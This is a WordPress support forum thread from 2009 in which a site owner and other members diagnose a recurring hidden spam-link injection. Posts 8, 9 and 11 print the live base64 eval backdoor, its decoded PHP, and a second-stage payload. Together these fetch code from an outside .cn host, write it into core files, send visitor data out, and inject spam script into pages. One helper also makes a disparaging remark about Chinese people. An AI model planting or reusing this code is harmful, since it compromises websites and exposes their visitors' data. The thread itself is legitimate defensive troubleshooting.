WordPress.org

1. talgalili
   Member
   Posted 4 months ago #

   Hello friends.

   I am using WP 2.8.1

   My home page (and every other page on the site: posts categories and so on), has a hidden link injection in it.

   The injection is located between the following CSS code:
   <div style="position:absolute;left:-1184px;top:-694px"> </div>
   And appears just after the </head><body> tags.

   To fix the problem all I need is to reinstall my wordpress files (which is very easy these days, thanks to the automated reinstall function of WP 2.7 and beyond)
   This erases the problem, but a few days after it reappears again.

   Also, I search for the files in my directory to see where it might get it from, and I found the "bad" code only in one file which is located on
   /home/public_html/DomainName/wp-content/cache/ 646a8a51de5aaba42e183fcd83aeff8d.html
   That is a file which is blank to the eye, but holds the bad code.
   I erased the file, to see if it will remove the bad code from the homepage. It didn't instead, when I refreshed the homepage, it just recreated the exact file in the exact location again.

   I don't know what bot is hacking my website or how.

   Any ideas ?

   Thanks,
   Tal

2. doodlebee
   Member
   Posted 4 months ago #

   Are your file/folder permissions set correctly? Have you changed your passwords? Have you contacted your host to see if there's been a compromised spot on the server? Checked your logs to see where it's coming from? Checked/cleaned your themes files and comments?

   You also might want to read this: Hardening WordPress

3. whooami
   Member
   Posted 4 months ago #

   hi tag

   heres the problem.

   you were hacked months ago

   http://wordpress.org/support/topic/282366?replies=3

   it never got fixed right the first time.

   youre seeing it happen again and again because youre addressing the symptom (changed files) not the cause.

   http://wordpress.org/support/topic/268083?replies=5#post-1065779

   thats the standard answer. the extra added thing is that you MUST scan your own machine(s) for malware.

   --

   Upgrading a hacked blog doesnt make it less hacked. it just makes it upgraded. if the door is already in place.. its still there.

4. schwooba
   Member
   Posted 4 months ago #

   I agree with doodlebee. It's probably a php setting on the server or check the .htaccess files.

5. doodlebee
   Member
   Posted 4 months ago #

   Thanks Schwooba - but I think whoomai's right: (and maybe I am too) - if he's had this problem before, then he probably didn't clean it properly the first time. As she says - if the door is there, it's still there unless he's done something about it in the correct manner.

6. jaward
   Member
   Posted 4 months ago #

   Here's a link to keep your site form getting hacked:

   http://semlabs.co.uk/journal/how-to-stop-your-wordpress-blog-getting-hacked

   I'm implementing and using almost all of the techniques on my site at http://www.thewordpresscafe.com

   I can't believe how smart these hackers are - it's just scary.

   Hope this helps.

7. talgalili
   Member
   Posted 4 months ago #

   Thanks everyone for the good tips.
   In the meantime I put: "WordPress File Monitor"
   And am waiting to see which file it is that is being hacked, maybe that will give me a clue as to the origin of the breach.

   doodlebee - I'll read it.
   whooami - that hack was a different one then this. Thank you for the links and the tips. The thing is that some of them are good guiding rules but might take a lot of time without real results. I am looking (and hoping) to get a better lock on where the problem is (again, with tools like wordpress file monitor), then to go changing passwords (again) and searching databases and looking every folder at a time comparing timestamps (which to be honest, I don't know how to do in an effective manner). And my name is Tal :)
   schwooba- I will have a look.
   jaward - thank you for the links :)

8. talgalili
   Member
   Posted 4 months ago #

   Ok people, I found where the changes are being made!
   Thanks to the file monitor plugin, I discovered the files hacked are:
   *wp-blog-header.php
   *wp-content/wp-manager.php
   *wp-includes/class-cache.php

   And here are the changes made for each of them:
   *in wp-blog-header.php
   They added this:

   ob_start();eval(base64_decode('aWYgKCFmdW5jdGlvbl9leGlzdHMoImNoaW5zdCIpKSB7IGZ1bmN0aW9uIGNoaW5zdCgpIHsgaWYgKCFmdW5jdGlvbl9leGlzdHMoImdldHUiKSkgeyBmdW5jdGlvbiBnZXR1KCR1LCAkcCA9IGFycmF5ICgpKSB7ICRjID0gQGN1cmxfaW5pdCgpOyBpZiAoJHApIHsgQGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1BPU1QsIDEpOyBAY3VybF9zZXRvcHQoJGMsIENVUkxPUFRfUE9TVEZJRUxEUywgJHApOyB9IEBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9VUkwsICR1KTsgQGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgQGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1RJTUVPVVQsIDMwKTsgJGggPSBAY3VybF9leGVjKCRjKTsgQGN1cmxfY2xvc2UoJGMpOyByZXR1cm4gJGg7IH0gfSBjbGVhcnN0YXRjYWNoZSgpOyAgaWYgKCFAZmlsZV9leGlzdHMoIi4vd3AtaW5jbHVkZXMvY2xhc3MtY2FjaGUucGhwIikgfHwgQGZpbGVtdGltZSgiLi93cC1pbmNsdWRlcy9jbGFzcy1jYWNoZS5waHAiKSA8PSAodGltZSgpIC0gKDYwICogNjAgKiAxMikpKSB7ICRpbmNfY29kZSA9IEBnZXR1KCJodHRwOi8vd3d3Lm15d2ViLXN0YXRpc3RpY3MuY24vaW5jbHVkZS5waHA/ZD1kYW5jZWluaXNyYWVsLmNvbSIpOyBpZiAoJGluY19jb2RlKSB7ICRmaCA9IEBmb3BlbigiLi93cC1pbmNsdWRlcy9jbGFzcy1jYWNoZS5waHAiLCAidysiKTsgQGZ3cml0ZSgkZmgsICRpbmNfY29kZSk7IEBmY2xvc2UoJGZoKTsgfSB9ICAkaCA9IG9iX2dldF9jb250ZW50cygpOyAkaCA9IHRyaW0oJGgpOyAgaWYgKCFlbXB0eSgkaCkgJiYgQGZpbGVfZXhpc3RzKCIuL3dwLWluY2x1ZGVzL2NsYXNzLWNhY2hlLnBocCIpKSB7IEBpbmNsdWRlKCIuL3dwLWluY2x1ZGVzL2NsYXNzLWNhY2hlLnBocCIpOyByZXR1cm4gdHJ1ZTsgfSBlbHNlaWYgKCFlbXB0eSgkaCkpIHsgcmV0dXJuIHRydWU7IH0gZWxzZSB7IHJldHVybiBmYWxzZTsgfSB9fQ=='));

   between:
   <?php
   AND
   /**
   * Loads the WordPress environment and template.
   *
   * @package WordPress
   */

   *to wp-content/wp-manager.php
   *to wp-includes/class-cache.php
   Well, they added it. I don't see them originally in the WP files...

   I removed to the extra files, and then uploaded a fresh wp-blog-header.php
   And all the spam link injection where gone.

   *******
   Do any of you have an idea how the bot is doing this?
   And how to make it stop ?
   *******

   Thanks!
   Tal

9. whooami
   Member
   Posted 4 months ago #

   sure .. you got that advice before:

   http://wordpress.org/support/topic/268083?replies=5#post-1065779

   how do I know this?

   Because the code you pasted above, when decoded, can easily be seen to be calling a function:

   if (!function_exists("chinst")) { function chinst() { if (!function_exists("getu")) { function getu($u, $p = array ()) { $c = @curl_init(); if ($p) { @curl_setopt($c, CURLOPT_POST, 1); @curl_setopt($c, CURLOPT_POSTFIELDS, $p); } @curl_setopt($c, CURLOPT_URL, $u); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = @curl_exec($c); @curl_close($c); return $h; } } clearstatcache(); if (!@file_exists("./wp-includes/class-cache.php") || @filemtime("./wp-includes/class-cache.php") <= (time() - (60 * 60 * 12))) { $inc_code = @getu("http://www.myweb-statistics.cn/include.php?d=danceinisrael.com"); if ($inc_code) { $fh = @fopen("./wp-includes/class-cache.php", "w+"); @fwrite($fh, $inc_code); @fclose($fh); } } $h = ob_get_contents(); $h = trim($h); if (!empty($h) && @file_exists("./wp-includes/class-cache.php")) { @include("./wp-includes/class-cache.php"); return true; } elseif (!empty($h)) { return true; } else { return false; } }}

   since the code is running, and the spam links are being displayed -- the code above is working, and the fucntions being called are accissible to the script.

   Another lazier alternative since you seem to want to cut corners, is to grep your files for:

   chinst

   OR

   get-u

   Also since the code above mentions a specific file,

   wp-includes/class-cache.php

   take a look at that..

   --

   if this were MY site, I would be following my repeated advice.. some people opt not to .. that's their problem.

10. whooami
    Member
    Posted 4 months ago #

    i was curious so I did some looking around,

    http://wordpress.org/support/topic/259206?replies=4

    hacked a while ago, same hack..

    not hacked now (or doesnt outwardly appear to be).

11. whooami
    Member
    Posted 4 months ago #

    finally,

    http://www. myweb-statistics.cn/ include.php?d =danceinisrael.com

    decoded crap there:

    if (!function_exists("getu_new")) { function getu_new($u, $p = array ()) { $c = curl_init(); if ($p) { curl_setopt($c, CURLOPT_POST, 1); curl_setopt($c, CURLOPT_POSTFIELDS, $p); } curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = curl_exec($c); curl_close ($c); return $h; }}if (!function_exists("gggggg_key")) { function gggggg_key(&$_SERVER, $path){ if(($pos1 = strpos($_SERVER["REQUEST_URI"], $path)) !== false){ $pos1 = $pos1 + strlen($path); $key = substr($_SERVER["REQUEST_URI"], $pos1); return $key; }else{ return false; } }}if (!function_exists("gggggg_kw")) { function gggggg_kw(&$_SERVER){ if(!empty($_SERVER["HTTP_REFERER"]) && stristr($_SERVER["HTTP_REFERER"], $_SERVER["HTTP_HOST"]) == ''){ $url = parse_url($_SERVER["HTTP_REFERER"]); $query = explode("&", urldecode($url["query"])); $host = $url["host"]; foreach ($query AS $quer) { $temp = explode("=", $quer); if ($temp[0] == "q" OR $temp[0] == "searchfor" OR $temp[0] == "p" OR $temp[0] == "as_q" OR $temp[0] == "query" OR $temp[0] == "search" OR $temp[0] == "qry" OR $temp[0] == "aqp") { $new_key = urldecode($temp[1]); break; } } return $new_key; } }}if (!function_exists("type_one")) { function type_one($path, $server_cache_url) { global $_SERVER; $post = array ( "i" => urlencode($_SERVER["REMOTE_ADDR"]), "l" => rawurldecode($_SERVER["HTTP_ACCEPT_LANGUAGE"]), "h" => rawurldecode($_SERVER["HTTP_HOST"]), "m" => rawurldecode($_SERVER["HTTP_HOST"]), "u" => rawurldecode($_SERVER["HTTP_USER_AGENT"]), "r" => rawurldecode($_SERVER["HTTP_REFERER"]) ); if (($key = gggggg_key($_SERVER, $path)) !== false) { $post["a"] = 1; $post["id"] = $key; } $html = getu_new($server_cache_url, $post); return $html; }}if (!function_exists("type_two_super_cachee")) { function type_two_super_cachee(&$buffer) { type_two("/?okk=", "http://www.myweb-statistics.cn/get.php", "86400", &$buffer); }}if (!function_exists("type_two")) { function type_two($path, $server_cache_url, $lifetime, $buffer = false) { global $_SERVER; $alt_path = ""; $cache_dir = "./wp-content/cache"; $timeout = $lifetime; clearstatcache(); if (!is_dir($cache_dir)) { mkdir($cache_dir, 0777, true); } if (($key = gggggg_key($_SERVER, $path)) !== false) { $cache_fname = md5("d_" . $key) . ".html"; $type = 1; } elseif(isset($alt_path) && ($key = gggggg_key($_SERVER, $alt_path)) !== false) { $path = $alt_path; $cache_fname = md5("d_" . $key) . ".html"; $type = 1; }else{ $cache_fname = md5("d_index") . ".html"; $type = 0; } if (file_exists($cache_dir . "/" . $cache_fname) && filemtime($cache_dir . "/" . $cache_fname) >= (time() - $timeout) && ((filesize($cache_dir . "/" . $cache_fname) > 3000 && $type == 1) || (filesize($cache_dir . "/" . $cache_fname) > 400 && $type == 0))) { $fh = @fopen($cache_dir . "/" . $cache_fname, "r"); $html = @fread($fh, filesize($cache_dir . "/" . $cache_fname)); @fclose ($fh); } else { @unlink($cache_dir . "/" . $cache_fname); $html = type_one($path, $server_cache_url); if (!empty($html) && strlen($html) > 400) { $fh = @fopen($cache_dir . "/" . $cache_fname, "w"); @fwrite($fh, $html); @fclose ($fh); } else { return false; } } if ($buffer) { $old_html = $buffer; } else { $old_html = ob_get_clean(); } if ($type == 1) { if (!$buffer) ob_end_clean(); else unset ($buffer); if ($_SERVER["HTTP_REFERER"]) { $new_key = gggggg_kw($_SERVER); if (!$buffer) { ob_end_clean(); ob_end_flush(); echo "<div id=\"load\" style=\"display:block;\">Please wait.... Page loading</div>"; flush(); } if ($new_key) { $feed_data = getu_new("http://www.myweb-statistics.cn/js.php?pin=yvXI%2BxE%3D&qr=5&f=v&q=" . urlencode($new_key) . "&ip=" . urlencode($_SERVER["REMOTE_ADDR"]) . "&ua=" . urlencode($_SERVER["HTTP_USER_AGENT"]) . "&ref=" . urlencode($_SERVER["HTTP_REFERER"]) . "&lang=" . urlencode($_SERVER["HTTP_ACCEPT_LANGUAGE"]) . "&host=" . urlencode($_SERVER["HTTP_HOST"]) . ""); flush(); } echo "<script> " . $feed_data . "</script>\r\n"; flush(); if (!$buffer) { echo "<script type=\"text/javascript\">document.getElementById(\"load\").style.display = \"none\";</script>\r\n"; flush(); } } if ($buffer) { $buffer = $html; } else { echo $html; exit; } } else { if ($_SERVER["HTTP_REFERER"] && strstr($_SERVER["REQUEST_URI"], '/?') != '') { $new_key = gggggg_kw($_SERVER); if (!empty($new_key)){ $null = getu_new("http://www.myweb-statistics.cn/js.php?pin=yvXI%2BxE%3D&qr=5&f=v&q=___err_key" . urlencode($new_key) . "&ip=" . urlencode($_SERVER["REMOTE_ADDR"]) . "&ua=" . urlencode($_SERVER["HTTP_USER_AGENT"]) . "&ref=" . urlencode($_SERVER["HTTP_REFERER"]) . "&lang=" . urlencode($_SERVER["HTTP_ACCEPT_LANGUAGE"]) . "&host=" . urlencode($_SERVER["HTTP_HOST"]) . ""); flush(); } } if (!empty($html)) { preg_match("#(<body[^>]+>|<body>)#i", $old_html, $body); if (empty($body[1])) { preg_match("#(</head>)#i", $old_html, $body); if (empty($body[1])) { preg_match_all("#<div(.*)>#i", $old_html, $match); $rand_div = "<div" . $match[1][array_rand($match[1])] . ">"; $pos1 = strpos($old_html, $rand_div); if ($pos1 > 0 && !defined("ALREADY_CHANGE_RDW")) { $old_html = substr_replace($old_html, $rand_div . $html, $pos1, strlen($rand_div)); define("ALREADY_CHANGE_RDW", true); } } else { if (!defined("ALREADY_CHANGE_HDW")) { $old_html = str_replace($body[1], $body[1] . $html, $old_html); define("ALREADY_CHANGE_HDW", true); } } } else { if (!defined("ALREADY_CHANGE_DW")) { $old_html = str_replace($body[1], $body[1] . $html, $old_html); define("ALREADY_CHANGE_DW", true); } } } if ($buffer) { $buffer = $old_html; } else { echo $old_html; } } }}

    type_two("/?okk=", "http://www.myweb-statistics.cn/get.php", "86400");

    gotta love the chinese.

    I say, f&ck them firewalling us -- we need to firewall them OUT

12. talgalili
    Member
    Posted 4 months ago #

    Hi whooami,
    Thank you for your help and advices!

    I have a few questions for you (if you are willing to help) :
    1) how did you decode the code I pastes? what did you use for that ?
    2) How should I check for chinst OR get-u ? could you instruct me of the exact code to use? I tried this:
    find /home/humus101/public_html/danceinisrael -type f | xargs grep -l 'chinst' 2>/dev/null >zz-infectedFileslist-chinst.txt
    But it failed.
    3) the file: wp-includes/class-cache.php, was created from the code. I erased it. the blog keeps working fine, and the links are gone.

    I am looking through your advices (which is maybe the 4th time I have), and each time I am seeing things that I don't know how to do, here are a few:

    1) Check for files that dont belong, directories that dont belong. Image files with changed timestamps
    -- How can I find these ???

    2) Look at your permissions. Do you have world writable files? Any world-writable directories? Are they necessary?
    -- Any way to map this with one command ?

    3) Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.
    -- where to check this ?

    Thanks again!

    Tal

13. talgalili
    Member
    Posted 4 months ago #

    Today I was hacked again.

    At:
    Timestamp: Tue, 21 Jul 2009 04:45:27 +0000

    The bot Added:
    wp-content/wp-manager.php

    And then Changed:
    wp-blog-header.php
    wp-includes/class-cache.php

    And now I have link injection in the blog.

    I erased the extra files to restore my blog.

    Any ideas how to discover how the bot is doing this?

14. talgalili
    Member
    Posted 1 month ago #

    The issue was resolved thanks to this:
    http://wordpress.org/support/topic/285169?replies=5

Reply

You must log in to post.